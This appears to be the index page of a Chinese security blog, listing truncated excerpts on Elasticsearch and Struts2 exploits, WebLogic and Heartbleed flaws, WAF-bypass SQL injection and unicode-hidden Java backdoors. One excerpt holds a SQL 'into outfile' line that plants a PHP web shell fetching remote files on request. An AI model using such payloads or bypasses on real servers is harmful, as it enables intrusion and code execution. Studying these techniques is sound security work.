[更新]Elasticsearch 代码执行漏洞利用工具
更新地址:Elasticsearch_1.2.jar 命令参数忘记编码了,导致不能执行多参数已修复了。修改了超时为10秒、异常情况直接输出页面源码。 1、ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。 2、Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个...
阅读全文Security(80 篇文章)
php shell
sql: select '<?php file_put_contents(dirname(__FILE__)."/".$_GET[\'file\'], file_get_contents($_GET[\'url\']));?>' into outfile'/var/www/html/xxx/dat...
阅读全文dom4j xml 格式化解析实体注入
解析代码: import java.io.StringReader; import java.io.StringWriter; import org.dom4j.Document; import org.dom4j.io.OutputFormat; import org.dom4j.io.SAXReader; import org.dom4j.io.XMLWriter; public class ...
阅读全文SQL 注入中的Insert、Update、Delete命令
下载地址:SQL 注入中的Insert、Update、Delete命令 SQL Injection in Insert, Update and Delete Statements...
阅读全文Struts2再曝高危漏洞(S2-020补丁绕过)
之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用! 暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat: http://127.0.0.1/s/example/HelloWorld.action?class.classLoad...
阅读全文Mysql Insert into set语法绕过360scan insert防注入
360scan正则:INSERT\\s+INTO.+?VALUES 其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx = 提交: http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123...
阅读全文Java 后门-unicode编码
Java代码默认可以直接全是unicode编码: 假设有如下未编码Java代码: public class Test { public static void main(String[] args) { System.out.println(1); } } 编码后的Java代码: \u0070\u0075\u0062\u006c\u0069\u0063 \u0063\u006c\u0061\u00...
阅读全文WebLogic CVE-2014-2470
Oracle WebLogic很容易出现一个远程安全漏洞。攻击者无需身份验证即可控制WebLogic服务器。漏洞利用T3协议使WLS Security子组建受影响。 版本:10.0.2.0, 10.3.6.0, 12.1.1.0, 12.1.2.0 WebLogic Server 中的 RMI 通信 WebLogic Server 中的 RMI 通信使用 T3 协议在 WebLogic Serve...
阅读全文OpenSSL HeartBleed漏洞CentOS下简单修复过程
今天这个洞比较火,赶紧测试了下自己的网站,果然存在问题,简单的修复过程如下(CentOS 6.5): yum search openssl #返回 Updating: openssl x86_64 1.0.1e-16.el6_5.7 updates 1.5 M Updating for dependencies: openssl-devel x86_64 1.0.1e-16.el6_5.7 upd...
阅读全文OpenSSL 高危漏洞
下载地址:ssltest.py 绝对高危,可读取对方服务器内存信息(sessionid之类都有)。...
阅读全文